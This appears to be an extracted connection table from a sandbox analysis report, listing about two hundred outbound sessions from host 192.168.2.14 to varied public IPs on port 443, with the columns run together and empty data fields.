                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12457192.168.2.1442736180.158.6.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12458192.168.2.145196013.67.73.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12459192.168.2.143438647.120.39.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12460192.168.2.1441400191.124.140.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12461192.168.2.145237437.21.113.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12462192.168.2.1457572112.223.170.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12463192.168.2.144793270.241.155.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12464192.168.2.1450610175.218.81.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12465192.168.2.1433414103.242.224.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12466192.168.2.1455144134.209.172.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12467192.168.2.145261885.29.174.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12468192.168.2.1437900122.62.129.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12469192.168.2.145591459.179.218.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12470192.168.2.1457310181.207.162.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12471192.168.2.1457374121.143.203.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12472192.168.2.1447384120.43.86.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12473192.168.2.145703893.246.251.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12474192.168.2.1436864146.11.28.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12475192.168.2.1434390170.190.119.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12476192.168.2.1455636203.220.232.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12477192.168.2.1437838165.90.205.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12478192.168.2.1434058180.151.198.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12479192.168.2.144928637.199.108.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12480192.168.2.1451580201.131.112.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12481192.168.2.1434504155.206.232.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12482192.168.2.1440292185.0.206.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12483192.168.2.143429460.92.225.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12484192.168.2.1437294171.96.107.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12485192.168.2.144577076.87.108.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12486192.168.2.1451424166.133.51.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12487192.168.2.1460930142.29.199.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12488192.168.2.145752678.129.34.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12489192.168.2.1441126195.9.167.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12490192.168.2.1456100219.73.153.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12491192.168.2.145181667.221.164.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12492192.168.2.143964646.47.68.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12493192.168.2.144684647.104.133.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12494192.168.2.1460348106.193.236.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12495192.168.2.1435464120.133.60.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12496192.168.2.144859049.54.79.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12497192.168.2.144212442.246.218.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12498192.168.2.1451826221.254.59.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12499192.168.2.144603671.202.252.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12500192.168.2.1460878118.87.221.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12501192.168.2.145472843.27.71.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12502192.168.2.1456418163.110.246.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12503192.168.2.1445046173.41.93.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12504192.168.2.145682887.119.40.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12505192.168.2.143562261.182.182.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12506192.168.2.1442244182.250.160.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12507192.168.2.144834835.192.240.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12508192.168.2.1448986179.141.102.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12509192.168.2.143802291.80.143.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12510192.168.2.1440668118.162.54.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12511192.168.2.1451552124.0.171.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12512192.168.2.1442580115.168.202.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12513192.168.2.1439028204.27.253.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12514192.168.2.144862054.12.3.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12515192.168.2.144899623.234.33.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12516192.168.2.1445090149.192.127.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12517192.168.2.144882868.108.25.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12518192.168.2.1458350118.255.71.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12519192.168.2.145019432.46.150.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12520192.168.2.1447264114.197.220.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12521192.168.2.144366866.67.199.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12522192.168.2.1451772113.46.120.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12523192.168.2.1439868194.58.13.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12524192.168.2.14576669.73.65.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12525192.168.2.1454664147.141.227.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12526192.168.2.143735019.99.133.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12527192.168.2.1451430162.185.239.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12528192.168.2.146021443.59.40.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12529192.168.2.1457954201.70.20.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12530192.168.2.1439278153.240.228.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12531192.168.2.1435816175.235.138.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12532192.168.2.1439196136.192.163.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12533192.168.2.1448162103.235.156.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12534192.168.2.144236441.183.255.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12535192.168.2.1436972155.159.161.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12536192.168.2.1447732223.156.61.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12537192.168.2.1455372184.49.105.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12538192.168.2.1452398175.77.224.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12539192.168.2.1450652187.250.163.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12540192.168.2.1450776147.141.56.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12541192.168.2.143895214.19.133.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12542192.168.2.1460774169.151.110.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12543192.168.2.145070243.101.244.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12544192.168.2.1441664126.63.173.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12545192.168.2.143440477.100.28.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12546192.168.2.14499389.79.4.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12547192.168.2.144080034.43.224.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12548192.168.2.1449280193.248.61.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12549192.168.2.145071812.238.30.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12550192.168.2.1432940160.98.188.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12551192.168.2.1441176164.68.134.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12552192.168.2.144796218.87.206.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12553192.168.2.143969282.213.14.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12554192.168.2.1434674162.11.17.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12555192.168.2.1450586113.179.207.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12556192.168.2.1453070196.222.243.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12557192.168.2.1442414223.242.83.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12558192.168.2.1441180138.177.235.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12559192.168.2.1443248220.52.45.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12560192.168.2.1437044200.22.240.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12561192.168.2.1444306160.48.70.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12562192.168.2.1441262146.225.106.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12563192.168.2.1438786167.29.144.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12564192.168.2.144327881.95.188.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12565192.168.2.144192471.245.114.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12566192.168.2.143882487.143.66.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12567192.168.2.1455148108.23.216.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12568192.168.2.145046448.47.30.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12569192.168.2.1444230167.217.233.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12570192.168.2.144951442.172.107.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12571192.168.2.1444618113.33.51.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12572192.168.2.1457244116.147.120.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12573192.168.2.1446318119.123.170.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12574192.168.2.1458324210.53.94.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12575192.168.2.1441616197.42.26.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12576192.168.2.1457790184.77.24.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12577192.168.2.1438634202.3.130.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12578192.168.2.143735832.246.177.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12579192.168.2.143837899.72.8.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12580192.168.2.1459536157.96.208.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12581192.168.2.1445520204.140.122.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12582192.168.2.144286254.245.64.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12583192.168.2.143531843.124.131.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12584192.168.2.1451926160.87.6.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12585192.168.2.1440116130.142.159.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12586192.168.2.1453724185.140.168.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12587192.168.2.1446088204.82.3.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12588192.168.2.145981285.201.18.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12589192.168.2.145859240.22.193.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12590192.168.2.1443722100.193.228.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12591192.168.2.1433986145.158.152.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12592192.168.2.1459620183.238.38.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12593192.168.2.145091453.39.135.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12594192.168.2.1439208190.232.222.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12595192.168.2.1441622175.91.145.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12596192.168.2.1449098161.167.235.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12597192.168.2.144653275.64.32.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12598192.168.2.145333870.243.75.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12599192.168.2.145838258.149.206.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12600192.168.2.1439840146.133.97.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12601192.168.2.144639482.181.247.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12602192.168.2.1437982189.204.233.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12603192.168.2.145182675.238.190.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12604192.168.2.1433076169.178.22.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12605192.168.2.14501921.66.107.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12606192.168.2.1438798212.179.197.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12607192.168.2.143727669.216.27.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12608192.168.2.144080438.46.61.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12609192.168.2.1449008147.209.86.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12610192.168.2.1444184194.105.237.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12611192.168.2.1450558195.56.206.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12612192.168.2.1443994176.154.211.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12613192.168.2.1456620109.72.50.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12614192.168.2.1444908124.166.165.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12615192.168.2.1435302114.239.231.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12616192.168.2.1449502166.155.98.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12617192.168.2.143606854.47.189.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12618192.168.2.1445626196.20.223.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12619192.168.2.1442020135.55.156.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12620192.168.2.1452262133.160.100.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12621192.168.2.1438526144.78.72.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12622192.168.2.1438844185.59.26.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12623192.168.2.1440630220.89.161.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12624192.168.2.1457014164.130.35.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12625192.168.2.1449736114.54.224.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12626192.168.2.145084223.97.153.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12627192.168.2.1456446140.145.72.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12628192.168.2.1438496111.65.242.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12629192.168.2.144585464.150.166.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12630192.168.2.144929867.215.115.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12631192.168.2.1445872133.239.124.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12632192.168.2.1435050135.187.187.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12633192.168.2.1454522173.131.103.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12634192.168.2.1454126223.30.137.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12635192.168.2.144649817.117.130.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12636192.168.2.1448786104.177.146.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12637192.168.2.1440144145.159.88.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12638192.168.2.144074264.48.106.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12639192.168.2.143616448.101.133.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12640192.168.2.1456278219.167.209.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12641192.168.2.1438704181.5.94.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12642192.168.2.145236681.191.161.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12643192.168.2.144786088.169.205.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12644192.168.2.1450232196.105.48.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12645192.168.2.1445742139.245.52.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12646192.168.2.144058823.62.8.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12647192.168.2.144175665.30.236.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12648192.168.2.1448412159.160.196.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12649192.168.2.1439680158.196.115.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12650192.168.2.1456472126.228.238.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12651192.168.2.1448770178.89.6.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12652192.168.2.143738014.8.239.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12653192.168.2.145644065.62.253.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12654192.168.2.144460891.71.100.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12655192.168.2.145274490.156.117.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12656192.168.2.145466685.73.4.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12657192.168.2.143495060.186.72.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12658192.168.2.1434174173.147.59.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12659192.168.2.1448290171.161.97.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12660192.168.2.143587463.104.180.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12661192.168.2.1433524111.192.248.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12662192.168.2.1436244197.90.183.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12663192.168.2.1436188159.18.248.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12664192.168.2.1452692139.115.185.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12665192.168.2.1443238177.79.168.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12666192.168.2.145409275.213.122.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12667192.168.2.143936453.241.205.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12668192.168.2.1455006197.122.8.87443
                                                        TimestampBytes transferredDirectionData


